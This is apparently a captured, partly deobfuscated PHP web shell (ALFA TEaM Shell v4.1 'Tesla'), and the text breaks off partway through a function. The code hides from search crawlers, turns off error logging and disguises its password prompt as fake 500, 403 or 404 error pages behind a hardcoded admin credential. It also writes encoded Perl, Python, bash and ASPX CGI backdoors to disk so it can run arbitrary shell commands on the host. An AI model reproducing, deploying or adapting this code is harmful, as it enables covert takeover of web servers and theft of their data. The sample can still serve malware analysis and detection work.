Wo61+/zX9CRKvKjbJVZ+Il94QyhgYIQEnToHrhqyLf8MRFFU7ulc3svdybWdK58+ULza/s/vBVm6Wvtbiymx8saZV3yG2+E6gzhFO0i/A8s8PvPIQFCZphqWz1TzzM+FEjDbZd7K3qjl5vpUeYqzb+DXPGiVqJ3xyJRXsFU5ssy1ir7dKuc9bGWQerldf0Ojvzy6nzjmuoHyHsDb2AVC/kD/RIfRAZ1P1+w5Wrnw4kwv5fGopDaP2MpFv9GSSZ+ShBBkEFsggDGMTDmv4kc4wIAvFFwHhwtNzrIE//PJil0UlqWyAfYErbillk8B2pSpIGb6g9EFawvupirKKwWTRIXCS5vKvCUJWISiVOL4OFQIwkeDv20ryjJZoUx212p9EXV3TdAl0UtlBq7PZMTWNJEtaiPahEhsSi5QYahgsUznhFLekpG65nZGI/pA/ijpLYpRlbsypQxRlvYhKfxDpRF+kcRyLI3UalVVH0kgZFiapfB3HcvJx/p3UyVrfOADFYYAhPXp8x8FGWIW6ZmjWQOhyIyMMs5WdEsVD/WqnaKQFK8HzfHCayYs8/oDfJJJ+nDsoSv6IvOGCJhEJgm9o3EyJ7fFQJ7ExzsVtj9KgFtlaBliuN/F87pdSp5QPXtbMZSMlexFmfuZX8Cl3sk8TP8x9vQYPx9721O0+T3lNrRMfjV9u2qLv48zW5pn8x4jO8g9fv3u7s9WLfzNWftuHRFNramUwxun2nejpokFY+eP7Uz+Ms/Ywbg+Q39DlSivs+muezTfcHr5JlY60t+1QoM8yuwLB16GwXGAgtqA4bkcZOwYYVsrKkUakV8l0AWRPqXmsxZQ3m1BU48AFbN+U+ugJfzcTvCbq3vkqXFEyWXue7PfOc79e+RjAVrl1vGETth/a610vxvh+cKS79vYtjLOfzpe69LpzULG4a6lt8JfLtY6PCJPMa3vlediSLlXHdrCA4G13j7t156RHXswSxZdED9nbYUn1bVa9GUoY6uvNkdTxa4unX3u1cVrbre1OaddrbrU5xyuln+Nv5Me2U6tv1qYhZb/mz+4Zzxqx8NrSo3Jtb1Lb2EmFz0mQVtmv2OxYLb634iLuuFs4yzeNXWFW7cziOLsFtYMah8B7I2dcNd1fuiapbsRrLaiSbp7Ao6pPdX1fK+U8z54zp/OujoSSp7TnjP+88chb+6sHdv/s9Xa9j3aj5/fa+d4//n2zX2yLFmuqkOmdqZ5xO1lnyzov2uDwOhPX3NybBWplYr6T5kpTfvrS3dupMRu3NdUOIgZYPVmuG9v2dlwDa1GM+MdI9kHzYmLl76P3iIB6tjbaT2KGIQvPVFzgubWP7MtpWtLfUz3qGd5n0ZsV77tmW8//z95/Jlo01+/06ruhFYqwBYHwENvZdtepf9vvbEQdO2cFy79a2Taq6fHZFcZLV1AT1qSOBO+5f2hTdt302prpxEFqwqdl1v1mkl1v+qTD1Opab9JO+ydsVbZ5Ir1flp5+7EWQUz6O7xsZ/Yq2ZsHz0Pn7PXR+SHTfdV7K71dVzw+/XvaZvr/OyIiMyIjMyIcF4j6eafub2ZT5KMhkiSmRkR+/tn5gnwJRkBITQgZ03uGrs3WBvXdV472NGalwNdo+j+5pfu8jikKJ+ep1L7ci3faDYJAwJe/pNglAwfVDoKA8H1AuCA";
eval /* PHPDeobfuscator eval output */ {
    session_start();
    error_reporting(0);
    @set_time_limit(0);
    @clearstatcache();
    @ini_set('error_log', NULL);
    @ini_set('log_errors', 0);
    @ini_set('max_execution_time', 0);
    @ini_set('output_buffering', 0);
    @ini_set('display_errors', 0);
    /*
    	Author: 	Solevisible/Alfa-Team
    	Telegram: 	https://telegram.me/solevisible
    	YouTube: 	https://youtube.com/solevisible
    	Gmail:		solevisible@gmail.com
    	Date:		Monday, September 14, 2020
    */
    $GLOBALS['oZgNypoPRU'] = array(
        'username' => 'admin',
        'password' => '8d44ef8a56b85e7a0894c99fc50f55e2',
        //md5(ehsan)
        'safe_mode' => '1',
        'login_page' => '500',
        'show_icons' => '1',
        'post_encryption' => false,
        'cgi_api' => true,
    );
    $CWppUDJxuf = 'function_exists';
    $aztJtafUXm = 'charCodeAt';
    $OVpGNqqFZs = 'eval';
    $psDEwGhsxg = 'gzinflate';
    if (!function_exists('base64_encode')) {
        function vcnvSCZgBz($data)
        {
            if (empty($data)) {
                return;
            }
            $b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
            $o1 = $o2 = $o3 = $h1 = $h2 = $h3 = $h4 = $bits = $i = 0;
            $ac = 0;
            $enc = '';
            $tmp_arr = array();
            if (!$data) {
                return $data;
            }
            do {
                $o1 = $aztJtafUXm($data, $i++);
                $o2 = $aztJtafUXm($data, $i++);
                $o3 = $aztJtafUXm($data, $i++);
                $bits = $o1 << 16 | $o2 << 8 | $o3;
                $h1 = $bits >> 18 & 0x3f;
                $h2 = $bits >> 12 & 0x3f;
                $h3 = $bits >> 6 & 0x3f;
                $h4 = $bits & 0x3f;
                $tmp_arr[$ac++] = charAt($b64, $h1) . charAt($b64, $h2) . charAt($b64, $h3) . charAt($b64, $h4);
            } while ($i < strlen($data));
            $enc = implode($tmp_arr, '');
            $r = strlen($data) % 3;
            return ($r ? substr($enc, 0, $r - 3) : $enc) . substr('===', $r || 3);
        }
        function charCodeAt($data, $char)
        {
            return ord(substr($data, $char, 1));
        }
        function charAt($data, $char)
        {
            return substr($data, $char, 1);
        }
    } else {
        function vcnvSCZgBz($s)
        {
            $b = 'base64_encode';
            return base64_encode($s);
        }
    }
    if (!$CWppUDJxuf('base64_decode')) {
        function zRtSHsbTzV($input)
        {
            if (empty($input)) {
                return;
            }
            $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
            $chr1 = $chr2 = $chr3 = "";
            $enc1 = $enc2 = $enc3 = $enc4 = "";
            $i = 0;
            $output = "";
            $input = preg_replace("[^A-Za-z0-9\\+\\/\\=]", "", $input);
            do {
                $enc1 = strpos($keyStr, substr($input, $i++, 1));
                $enc2 = strpos($keyStr, substr($input, $i++, 1));
                $enc3 = strpos($keyStr, substr($input, $i++, 1));
                $enc4 = strpos($keyStr, substr($input, $i++, 1));
                $chr1 = $enc1 << 2 | $enc2 >> 4;
                $chr2 = ($enc2 & 15) << 4 | $enc3 >> 2;
                $chr3 = ($enc3 & 3) << 6 | $enc4;
                $output .= chr((int) $chr1);
                if ($enc3 != 64) {
                    $output .= chr((int) $chr2);
                }
                if ($enc4 != 64) {
                    $output .= chr((int) $chr3);
                }
                $chr1 = $chr2 = $chr3 = "";
                $enc1 = $enc2 = $enc3 = $enc4 = "";
            } while ($i < strlen($input));
            return $output;
        }
    } else {
        function zRtSHsbTzV($s)
        {
            $b = 'base64_decode';
            return base64_decode($s);
        }
    }
    function __ZW5jb2Rlcg($s)
    {
        return vcnvSCZgBz($s);
    }
    function __ZGVjb2Rlcg($s)
    {
        return zRtSHsbTzV($s);
    }
    $GLOBALS['DB_NAME'] = $GLOBALS['oZgNypoPRU'];
    foreach ($GLOBALS['DB_NAME'] as $key => $value) {
        $prefix = substr($key, 0, 2);
        if ($prefix == "us") {
            $GLOBALS['DB_NAME']["user"] = $value;
            $GLOBALS['DB_NAME']["user_rand"] = $key;
        } elseif ($prefix == "pa") {
            $GLOBALS['DB_NAME']["pass"] = $value;
            $GLOBALS['DB_NAME']["pass_rand"] = $key;
        } elseif ($prefix == "sa") {
            $GLOBALS['DB_NAME']["safemode"] = $value;
            $GLOBALS['DB_NAME']["safemode_rand"] = $key;
        } elseif ($prefix == "lo") {
            $GLOBALS['DB_NAME']["login_page"] = $value;
            $GLOBALS['DB_NAME']["login_page_rand"] = $key;
        } elseif ($prefix == "sh") {
            $GLOBALS['DB_NAME']["show_icons"] = $value;
            $GLOBALS['DB_NAME']["show_icons_rand"] = $key;
        } elseif ($prefix == "po") {
            $GLOBALS['DB_NAME']["post_encryption"] = $value;
            $GLOBALS['DB_NAME']["post_encryption_rand"] = $key;
        } elseif ($prefix == "cg") {
            $GLOBALS['DB_NAME']["cgi_api"] = $value;
            $GLOBALS['DB_NAME']["cgi_api_rand"] = $key;
        }
    }
    unset($GLOBALS['oZgNypoPRU']);
    if (!isset($_SERVER["HTTP_HOST"])) {
        exit;
    }
    if (!empty($_SERVER['HTTP_USER_AGENT'])) {
        $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "bot", "spider");
        if (preg_match("/Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler|bot|spider/i", $_SERVER['HTTP_USER_AGENT'])) {
            header('HTTP/1.0 404 Not Found');
            exit;
        }
    }
    if (!isset($GLOBALS['DB_NAME']['user'])) {
        exit('$GLOBALS[\'DB_NAME\'][\'user\']');
    }
    if (!isset($GLOBALS['DB_NAME']['pass'])) {
        exit('$GLOBALS[\'DB_NAME\'][\'pass\']');
    }
    if (!isset($GLOBALS['DB_NAME']['safemode'])) {
        exit('$GLOBALS[\'DB_NAME\'][\'safemode\']');
    }
    if (!isset($GLOBALS['DB_NAME']['login_page'])) {
        exit('$GLOBALS[\'DB_NAME\'][\'login_page\']');
    }
    if (!isset($GLOBALS['DB_NAME']['show_icons'])) {
        exit('$GLOBALS[\'DB_NAME\'][\'show_icons\']');
    }
    if (!isset($GLOBALS['DB_NAME']['post_encryption'])) {
        exit('$GLOBALS[\'DB_NAME\'][\'post_encryption\']');
    }
    define("__ALFA_VERSION__", "4.1");
    define("__ALFA_UPDATE__", "2");
    define("__ALFA_CODE_NAME__", "Tesla");
    define("__ALFA_DATA_FOLDER__", "ALFA_DATA");
    define("__ALFA_POST_ENCRYPTION__", isset($GLOBALS["DB_NAME"]["post_encryption"]) && $GLOBALS["DB_NAME"]["post_encryption"] == true ? true : false);
    define("__ALFA_SECRET_KEY__", __ALFA_POST_ENCRYPTION__ ? _AlfaSecretKey() : '');
    $GLOBALS['__ALFA_COLOR__'] = array("shell_border" => array("key_color" => "#0E304A", "multi_selector" => array(".header" => "border: 7px solid {color}", "#meunlist" => "border-color: {color}", "#hidden_sh" => "background-color: {color}", ".ajaxarea" => "border: 1px solid {color}", ".foot" => "border-color: {color}")), "header_vars" => "#27979B", "header_values" => "#67ABDF", "header_on" => "#00FF00", "header_off" => "#ff0000", "header_none" => "#00FF00", "home_shell" => "#ff0000", "home_shell:hover" => array("key_color" => "#FFFFFF", "multi_selector" => array(".home_shell:hover" => "color: {color};")), "back_shell" => "#efbe73", "back_shell:hover" => array("key_color" => "#FFFFFF", "multi_selector" => array(".back_shell:hover" => "color: {color};")), "header_pwd" => "#00FF00", "header_pwd:hover" => array("key_color" => "#FFFFFF", "multi_selector" => array(".header_pwd:hover" => "color: {color};")), "header_drive" => "#00FF00", "header_drive:hover" => array("key_color" => "#FFFFFF", "multi_selector" => array(".header_drive:hover" => "color: {color};")), "header_show_all" => "#00FF00", "disable_functions" => "#ff0000", "footer_text" => "#27979B", "menu_options" => "#27979B", "menu_options:hover" => array("key_color" => "#646464", "multi_selector" => array(".menu_options:hover" => "background-color: {color};font-weight: unset;")), "options_list" => array("key_color" => "#00FF00", "multi_selector" => array(".content_options_holder .header center a" => "color: {color};")), "options_list:hover" => array("key_color" => "#FFFFFF", "multi_selector" => array(".content_options_holder .header center a:hover" => "color: {color};")), "options_list_header" => array("key_color" => "#59cc33", "multi_selector" => array(".txtfont_header" => "color: {color};")), "options_list_text" => array("key_color" => "#FFFFFF", "multi_selector" => array(".txtfont,.tbltxt" => "color: {color};")), "Alfa+" => array("key_color" => "#06ff0f", "multi_selector" => array(".alfa_plus" => "color: {color};font-weight: unset;")), "hidden_shell_text" => array("key_color" => "#00FF00", "multi_selector" => array("#hidden_sh a" => "color: {color};")), "hidden_shell_version" => "#ff0000", "shell_name" => "#FF0000", "main_row:hover" => array("key_color" => "#646464", "multi_selector" => array(".main tr:hover" => "background-color: {color};")), "main_header" => array("key_color" => "#FFFFFF", "multi_selector" => array(".main th" => "color: {color};")), "main_name" => array("key_color" => "#FFFFFF", "multi_selector" => array(".main .main_name" => "color: {color};font-weight: unset;")), "main_size" => "#67ABDF", "main_modify" => "#67ABDF", "main_owner_group" => "#67ABDF", "main_green_perm" => "#25ff00", "main_red_perm" => "#FF0000", "main_white_perm" => "#FFFFFF", "beetween_perms" => "#FFFFFF", "main_actions" => array("key_color" => "#FFFFFF", "multi_selector" => array(".main .actions" => "color: {color};")), "menu_options:hover" => array("key_color" => "#646464", "multi_selector" => array(".menu_options:hover" => "background-color: {color};font-weight: unset;")), "minimize_editor_background" => array("key_color" => "#0e304a", "multi_selector" => array(".minimized-wrapper" => "background-color: {color};")), "minimize_editor_text" => array("key_color" => "#f5deb3", "multi_selector" => array(".minimized-text" => "color: {color};")), "editor_border" => array("key_color" => "#0e304a", "multi_selector" => array(".editor-explorer,.editor-modal" => "border: 2px solid {color};")), "editor_background" => array("key_color" => "rgba(0, 1, 23, 0.94)", "multi_selector" => array(".editor-explorer,.editor-modal" => "background-color: {color};")), "editor_header_background" => array("key_color" => "rgba(21, 66, 88, 0.93)", "multi_selector" => array(".editor-header" => "background-color: {color};")), "editor_header_text" => array("key_color" => "#00ff7f", "multi_selector" => array(".editor-path" => "color: {color};")), "editor_header_button" => array("key_color" => "#1d5673", "multi_selector" => array(".close-button, .editor-minimize" => "background-color: {color};")), "editor_actions" => array("key_color" => "#FFFFFF", "multi_selector" => array(".editor_actions" => "color: {color};")), "editor_file_info_vars" => array("key_color" => "#FFFFFF", "multi_selector" => array(".editor_file_info_vars" => "color: {color};")), "editor_file_info_values" => array("key_color" => "#67ABDF", "multi_selector" => array(".filestools" => "color: {color};")), "editor_history_header" => array("key_color" => "#14ff07", "multi_selector" => array(".hheader-text,.history-clear" => "color: {color};")), "editor_history_list" => array("key_color" => "#03b3a3", "multi_selector" => array(".editor-file-name" => "color: {color};")), "editor_history_selected_file" => array("key_color" => "rgba(49, 55, 93, 0.77)", "multi_selector" => array(".is_active" => "background-color: {color};")), "editor_history_file:hover" => array("key_color" => "#646464", "multi_selector" => array(".file-holder > .history:hover" => "background-color: {color};")), "input_box_border" => array("key_color" => "#0E304A", "multi_selector" => array("input[type=text],textarea" => "border: 1px solid {color}")), "input_box_text" => array("key_color" => "#999999", "multi_selector" => array("input[type=text],textarea" => "color: {color};")), "input_box:hover" => array("key_color" => "#27979B", "multi_selector" => array("input[type=text]:hover,textarea:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};")), "select_box_border" => array("key_color" => "#0E304A", "multi_selector" => array("select" => "border: 1px solid {color}")), "select_box_text" => array("key_color" => "#FFFFEE", "multi_selector" => array("select" => "color: {color};")), "select_box:hover" => array("key_color" => "#27979B", "multi_selector" => array("select:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};")), "button_border" => array("key_color" => "#27979B", "multi_selector" => array("input[type=submit],.button,#addup" => "border: 1px solid {color};")), "button:hover" => array("key_color" => "#27979B", "multi_selector" => array("input[type=submit]:hover" => "box-shadow:0 0 4px {color};border:2px solid {color};", ".button:hover,#addup:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};")), "outputs_text" => array("key_color" => "#67ABDF", "multi_selector" => array(".ml1" => "color: {color};")), "outputs_border" => array("key_color" => "#0E304A", "multi_selector" => array(".ml1" => "border: 1px solid {color};")), "uploader_border" => array("key_color" => "#0E304A", "multi_selector" => array(".inputfile" => "box-shadow:0 0 4px {color};border:1px solid {color};")), "uploader_background" => array("key_color" => "#0E304A", "multi_selector" => array(".inputfile strong" => "background-color: {color};")), "uploader_text_right" => array("key_color" => "#FFFFFF", "multi_selector" => array(".inputfile strong" => "color: {color};")), "uploader_text_left" => array("key_color" => "#25ff00", "multi_selector" => array(".inputfile span" => "color: {color};")), "uploader:hover" => array("key_color" => "#27979B", "multi_selector" => array(".inputfile:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};")), "uploader_progress_bar" => array("key_color" => "#00ff00", "multi_selector" => array(".up_bar" => "background-color: {color};")), "mysql_tables" => "#00FF00", "mysql_table_count" => "#67ABDF", "copyright" => "#dfff00", "scrollbar" => array("key_color" => "#1e82b5", "multi_selector" => array("*::-webkit-scrollbar-thumb" => "background-color: {color};")), "scrollbar_background" => array("key_color" => "#000115", "multi_selector" => array("*::-webkit-scrollbar-track" => "background-color: {color};")));
    $GLOBALS['__file_path'] = str_replace('\\', '/', trim("/var/www/html/tesla.php.39f0b707f7b831d262cc2fb4b12b8ff4.bin"));
    $config = array('AlfaUser' => $GLOBALS['DB_NAME']['user'], 'AlfaPass' => $GLOBALS['DB_NAME']['pass'], 'AlfaProtectShell' => $GLOBALS['DB_NAME']['safemode'], 'AlfaLoginPage' => $GLOBALS['DB_NAME']['login_page']);
    //@session_start();
    @session_write_close();
    @ignore_user_abort(true);
    @set_time_limit(0);
    @ini_set('memory_limit', '-1');
    @ini_set("upload_max_filesize", "9999m");
    if ($config['AlfaProtectShell']) {
        $SERVER_SIG = isset($_SERVER["SERVER_SIGNATURE"]) ? $_SERVER["SERVER_SIGNATURE"] : "";
        $Eform = '<form method="post"><input style="margin:0;background-color:#fff;border:1px solid #fff;" type="password" name="password"></form>';
        if ($config['AlfaLoginPage'] == 'gui') {
            if (@$_COOKIE["AlfaUser"] != $config['AlfaUser'] && $_COOKIE["AlfaPass"] != md5($config['AlfaPass'])) {
                if (@$_POST["usrname"] == $config['AlfaUser'] && @md5($_POST["password"]) == $config['AlfaPass']) {
                    __alfa_set_cookie("AlfaUser", $config['AlfaUser']);
                    __alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
                    @header('location: ' . $_SERVER["PHP_SELF"]);
                }
                echo "\r\n<style>\r\nbody{background: black;}\r\n#loginbox { font-size:11px; color:green; right:85px; width:1200px; height:200px; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; }\r\n#loginbox td { border-radius:5px; font-size:11px; }\r\n</style>\r\n<title>~ ALFA TEaM Shell-v4.1-Tesla ~</title><center>\r\n<center><img style=\"border-radius:100px;\" width=\"500\" height=\"250\" alt=\"alfa team 2012\" draggable=\"false\" src=\"http://solevisible.com/images/alfa-iran.png\" /></center>\r\n<div id=loginbox><p><font face=\"verdana,arial\" size=-1>\r\n<center><table cellpadding='2' cellspacing='0' border='0' id='ap_table'>\r\n<tr><td bgcolor=\"green\"><table cellpadding='0' cellspacing='0' border='0' width='100%'><tr><td bgcolor=\"green\" align=center style=\"padding:2;padding-bottom:4\"><b><font color=\"white\" size=-1 color=\"white\" face=\"verdana,arial\"><b>~ ALFA TEaM Shell-v4.1-Tesla ~</b></font></th></tr>\r\n<tr><td bgcolor=\"black\" style=\"padding:5\">\r\n<form method=\"post\">\r\n<input type=\"hidden\" name=\"action\" value=\"login\">\r\n<input type=\"hidden\" name=\"hide\" value=\"\">\r\n<center><table>\r\n<tr><td><font color=\"green\" face=\"verdana,arial\" size=-1>Login:</font></td><td><input type=\"text\" size=\"30\" name=\"usrname\" placeholder=\"username\" onfocus=\"if (this.value == 'username'){this.value = '';}\"></td></tr>\r\n<tr><td><font color=\"green\" face=\"verdana,arial\" size=-1>Password:</font></td><td><input type=\"password\" size=\"30\" name=\"password\" placeholder=\"password\" onfocus=\"if (this.value == 'password') this.value = '';\"></td></tr>\r\n<tr><td><font face=\"verdana,arial\" size=-1>&nbsp;</font></td><td><font face=\"verdana,arial\" size=-1><input type=\"submit\" value=\"Login\"></font></td></tr></table>\r\n</div><br /></center>";
                exit;
            }
        } elseif ($config['AlfaLoginPage'] == '500') {
            if (@$_COOKIE["AlfaPass"] != @md5($config['AlfaPass'])) {
                if (@md5($_POST["password"]) == $config['AlfaPass']) {
                    __alfa_set_cookie("AlfaUser", $config['AlfaUser']);
                    __alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
                    @header('location: ' . $_SERVER["PHP_SELF"]);
                }
                echo '<html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error or misconfiguration and was unable to complete your request.</p><p>Please contact the server administrator, ' . $_SERVER['SERVER_ADMIN'] . ' and inform them of the time the error occurred, and anything you might have done that may have caused the error.</p><p>More information about this error may be available in the server error log.</p><hr>' . $SERVER_SIG . '</body></html>' . $Eform;
                exit;
            }
        } elseif ($config['AlfaLoginPage'] == '403') {
            if (@$_COOKIE["AlfaPass"] != @md5($config['AlfaPass'])) {
                if (@md5($_POST["password"]) == $config['AlfaPass']) {
                    __alfa_set_cookie("AlfaUser", $config['AlfaUser']);
                    __alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
                    @header('location: ' . $_SERVER["PHP_SELF"]);
                }
                echo "<html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access " . $_SERVER['PHP_SELF'] . " on this server.</p><hr>" . $SERVER_SIG . "</body></html>" . $Eform;
                exit;
            }
        } elseif ($config['AlfaLoginPage'] == '404') {
            if (@$_COOKIE["AlfaPass"] != @md5($config['AlfaPass'])) {
                if (@md5($_POST["password"]) == $config['AlfaPass']) {
                    __alfa_set_cookie("AlfaUser", $config['AlfaUser']);
                    __alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
                    @header('location: ' . $_SERVER["PHP_SELF"]);
                }
                echo "<title>404 Not Found</title><h1>Not Found</h1><p>The requested URL " . $_SERVER['PHP_SELF'] . " was not found on this server.<br><br>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr>" . $SERVER_SIG . "</body></html>" . $Eform;
                exit;
            }
        }
    }
    function decrypt_post($str)
    {
        if (__ALFA_POST_ENCRYPTION__) {
            $pwd = __ALFA_SECRET_KEY__;
            $pwd = __ZW5jb2Rlcg($pwd);
            $str = __ZGVjb2Rlcg($str);
            $enc_chr = "";
            $enc_str = "";
            $i = 0;
            while ($i < strlen($str)) {
                for ($j = 0; $j < strlen($pwd); $j++) {
                    $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j]));
                    $enc_str .= $enc_chr;
                    $i++;
                    if ($i >= strlen($str)) {
                        break;
                    }
                }
            }
            return __ZGVjb2Rlcg($enc_str);
        } else {
            return __ZGVjb2Rlcg($str);
        }
    }
    function _AlfaSecretKey()
    {
        $secret = @$_COOKIE["AlfaSecretKey"];
        if (!isset($_COOKIE["AlfaSecretKey"])) {
            $secret = uniqid(mt_rand(), true);
            __alfa_set_cookie("AlfaSecretKey", $secret);
        }
        return $secret;
    }
    function alfa_getColor($target)
    {
        if (isset($GLOBALS["DB_NAME"]["color"][$target]) && $GLOBALS["DB_NAME"]["color"][$target] != "") {
            return $GLOBALS["DB_NAME"]["color"][$target];
        } else {
            $target = $GLOBALS["__ALFA_COLOR__"][$target];
            if (is_array($target)) {
                return $target["key_color"];
            } else {
                return $target;
            }
        }
    }
    function alfaCssLoadColors()
    {
        $css = "";
        foreach ($GLOBALS['__ALFA_COLOR__'] as $key => $value) {
            if (!is_array($value)) {
                $value = alfa_getColor($key);
                $css .= ".{$key}{color: {$value};}";
            } else {
                if (isset($value["multi_selector"])) {
                    foreach ($value["multi_selector"] as $k => $v) {
                        $color = alfa_getColor($key);
                        $code = str_replace("{color}", $color, $v);
                        $css .= $k . "{" . $code . "}";
                    }
                }
            }
        }
        return $css;
    }
    if (isset($_POST['ajax'])) {
        function AlfaNum()
        {
            $args = func_get_args();
            $alfax = array();
            $find = array();
            for ($i = 1; $i <= 10; $i++) {
                $alfax[] = $i;
            }
            foreach ($args as $arg) {
                $find[] = $arg;
            }
            echo "<script>";
            foreach ($alfax as $alfa) {
                if (in_array($alfa, $find)) {
                    continue;
                }
                echo 'alfa' . $alfa . "_=";
            }
            echo "\"\"</script>";
        }
    }
    function _alfa_cgicmd($cmd, $lang = "perl", $set_cookie = false)
    {
        if (!$GLOBALS["DB_NAME"]["cgi_api"]) {
            return "";
        }
        if (isset($_COOKIE["alfacgiapi_mode"])) {
            return "";
        }
        $cmd_pure = $cmd;
        $is_curl = function_exists('curl_version');
        $is_socket = function_exists('fsockopen');
        if ($is_curl || $is_socket) {
            $recreate = false;
            if (isset($_COOKIE["alfacgiapi"])) {
                if (!@file_exists("alfacgiapi/" . $_COOKIE["alfacgiapi"] . ".alfa")) {
                    $recreate = true;
                    $lang = $_COOKIE["alfacgiapi"];
                }
            }
            if (!isset($_COOKIE["alfacgiapi"]) || $recreate) {
                @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
                $perl = 'jZFRT8IwFIXf/RXXOqWNsKoxPlAwRliERIbK9EUMGdsFGrYyt2Iky/ztdkMlJj74cpKee853k96Dfb7OUj6ViieYRgDQ6FdOtAr8iE99FcZS7a0zhEF/4DSb136GF+ciSaXSQDorpVHpht4k2ASN75ovdByN1VgRIWfUctynvPbg3D86I28ycLzesFsrAF+B3A1HHmF5vAFqyTpYS9wYffMjo1IxkaIf0pHX7buVYaRidYau57je5NZxb7xerWDiSipoQ5ZEUlN+xL/qs5UBBAvzAHoCtg3WgbFzM3u25Au0PyDj42MOfC7objfbkdpbUpmuwxkTZWhbO6S2zXjiB0tKAlKHBb5T65QxPkdRQv6RkioveQXYbSDjEwJyBjTEmVQY0p8pY7+TJVwU5bcalwRxSAqWby8RYrAKcTKtrvM1X2CwNAmbtJIUL4nINpnGmP4VrVDs+6otXhWK4hM=';
                $py = "bZDBS8MwGMXPy19R66EtzhRk7DA3L1rxItOt3gajTb6twTQJydexIf7vJqvMiR5CyHvv93jk8iLvnM1roXJzwEYrgvYwIQPRGm0xYluB9W1/UVBVLSHNCOwZGPQpUzlHvqPaDX1sWFcOxiOy0baNZgGkjwIkX6K21RZSUDthtZp9JIvi9a1YluvnonyaPyST5GW+LJPPjLCWezIU0C3grpIdpIkXE281wN7/MYPsbWOFwii+1wpB4TUeDEwQ9pg32MqVXalwYiI2ka8L84/5fjGtxyMOTHNIj3XZVTw1Fu5iMmCNkHztkAs1jE4P3aFfoh012oC6Sf/WtDzLftGUSe3CBw4suE4G/ryOWqh4eo4E8cT0a3uSOrTC/KjxND+O/QI=";
                $bash = "rVRdj5pAFH2uv+I6DGa1Iaybpg9amrRboptYbV360JQGWRiFyPI5WreU/95hoCyjsfFh52nm3nM/zuTcK3XVBz9UH+zM6xDHi0AhgG6jkJKQKvQpJiOg5EBVjz4GZmiGqLPehQ71oxCcjW9tCLW+LO4Na2+n2VU/7wA7PwDhpf71m87sn3VjuviEoKsBKoEIfkKvBymhuzSs0V1QfrMQFrD8bt0by7v5xDqH5cjbxdzQ54Y10+cTYyrCXqXEdkGZwxEKTtLzjHVUIdJyiRO5hHF6poQlUEICw5OegsixA9gDBY+/qYZwPlTV1yoUsoy47ZfnB6RMkku0AGVD4RoUmzHJaVH9jcxYjMGNOLw8+zLNvmAIWTblQYEaDy9ApYHcsvnrC7JTj4RNRHk8jUFG16ObQjBXBZgVCea6I7T6pxOTnQPOvWLV4NY+v7pRSPiFQ6uw/3w3U5Gon/KzAwo3Zz47gRi27MszbnPsjAAegv9MbqIbfaH3RmR5WwZFLZ1EO3b0ROrjcfMslSPmPpmDCypz8Nnylfd8Dx8XxvRF+b0MhaS4nAbJbIdfMs9f0+qmIcADECemrpwcj0fMC8pyrz0Z29IYy7LWNnLZxtJAa9mqdiUcC+Hl3hoiYPPyYTZDoHDlZirgLaj1IOGsJmwKpMghjlLK3FukoZWwQcBEeG+iFRIHoxmElv65toDV7iQ7kj5p+IqPD3YeXfgDbEWTt29AUarU/WpdNxiPONuzqHKpv4tT8t50UId1FbBdwWsULb9aA/4C";
                $aspx = "jZNda9swFIavk18hNAoOAXdsozdLyrrUKYaRlriNN0IuFPvEFbUl70jOB2P97T1SPBo8ynZlS+d53/Ph49HZF3YnCmDfhCoaehnzyTvOIiXWJSwk7BIrLF1uRGmAs7PL/ogUcVVrtGwmKjC1yCieHIyFKkxhHT7E7jHRyqIuzb8111IUShsrs/+A41vPENTvGYtSFSyrcjZmc/jZgLHhVGO15HTHV59fkUfInv6G3K3H5CZokTHj6cfZdn2z+CC+z+of1b7cVNOdWLwf88Gvfq+3PlhYrlgurCDDtipqdgtIvqirr8LAxafEJw6ojgH59441tvQ97G14lUziOFKZzok7nsIbsK3O2ZOQlHeoMzCG1aRXsGPtOfC2dUifB22sNjqcINCXmulUqlzviLbYQBeayhLcUCnsZhTCHniXucKiqUBZ46DzjHE2dDPuYg8Gkkcoy2gPWWOdo9+RLjaHXCJk1JhQucD8trF1Y98orwtHiBrfYFONTzSqay/QePDVnjYTHAfYroD+k9dHT0qhpCK/15HKgwF1+hr2yU+jzntO+6iVgTBFaSHgS6NL2Eoj6Xd5FrVcjWqESz48phvy0bk/O+3vPi3uCw==";
                if ($lang == "perl") {
                    $source = $perl;
                } elseif ($lang == "py") {
                    $source = $py;
                } else {
                    $source = $bash;
                }
                if ($lang == "aspx") {
                    alfaWriteTocgiapi("aspx.aspx", $aspx);
                } else {
                    alfaWriteTocgiapi($lang . ".alfa", $source);
                }
                alfacgihtaccess('cgi', "alfacgiapi/");
            } else {
                $lang = $_COOKIE["alfacgiapi"];
            }
            $cgi_ext = ".alfa";
            if ($lang == "aspx") {
                $cgi_ext = ".aspx";
            }
            $cgi_url = "ALFA_DATA/alfacgiapi/" . $lang . $cgi_ext;
            $cmd = "check=W3NvbGV2aXNpYmxlfmFwaV0=&cmd=" . __ZW5jb2Rlcg("cd " . $GLOBALS['cwd'] . ";" . $cmd);
            if ($is_curl) {
                $address = ($_SERVER['SERVER_PORT'] == 443 ? "https://" : "http://") . $_SERVER["SERVER_NAME"] . dirname($_SERVER["REQUEST_URI"]) . "/" . $cgi_url;
                $post = new AlfaCURL();
                $data = $post->Send($address, "post", $cmd);
            } elseif ($is_socket) {
                $server = $_SERVER["SERVER_NAME"];
                $uri = dirname($_SERVER["REQUEST_URI"]) . "/" . $cgi_url;
                $data = _alfa_fsockopen($server, $uri, $cmd);
            }
            $out = "";
